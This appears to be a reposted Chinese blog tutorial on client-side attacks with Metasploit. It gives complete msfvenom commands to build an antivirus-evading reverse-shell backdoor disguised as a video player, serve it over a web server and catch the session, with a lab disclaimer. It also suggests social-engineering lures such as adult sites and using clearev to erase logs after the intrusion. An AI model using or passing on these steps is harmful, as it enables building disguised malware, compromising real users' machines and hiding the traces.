标签:exe x86 windows 恶意软件 -- xx msfvenom 客户端
目录
工具
Metasploit
靶机
windows 2008 r2
相信大多数网友都是下载的虚拟机,所以请设置成桥接模式,确保位于同一网段
注:以下内容仅供学习交流,请勿用于非法用途
客户端渗透原理
在我们无法突破对方的网络边界时,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们向目标发一个含有后门的程序,或者是一个word文档,pdf文件。想要达到效果同时也要利用好社会工程学,来诱惑受害者执行恶意程序。
由于有杀毒软件,所以我们可以利用颜色网站或者免杀来躲避查杀。
免杀可以通过修改二进制特征字符或者进行加密。
制作Windows恶意软件获取shell
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。
生成xx影音.exe后门程序
使用一个编码器
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/xx影音1.exe
使用两个编码器进一步加强免杀能力
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 20 | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f exe -o /var/www/html/xx影音2.exe
参数说明
-a 指定架构,如:x86和x64,x86代表32位,x64代表64位。
--platform 指定平台,这里选择windows,通过 --l platforms可以查看所有支持的平台
-p 设置攻击载荷
-b 去掉坏字符,坏字符会影响payload的正常执行
启动apache2
systemctl start apache2
然后后去目标浏览器下载
http://192.168.242.128/xx影音2.exe
会弹出一个下载界面,点击下载打开即可
回到kali启用msf监听
msf6 > use exploit.multi/handler
设置payload
msf6 > set payload windows/meterpreter/reverse_tcp
成功建立会话,进入后可利用getuid查看权限,利用help可查看命令
clearev命令
入侵痕迹擦除
在渗透利用过程中难免留下日志等信息痕迹,使用clearev命令擦除痕迹后再跑。
命令:clearev
标签:exe,x86,windows,恶意软件,--,xx,msfvenom,客户端 来源: https://blog.csdn.net/m0_56988395/article/details/123031722
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。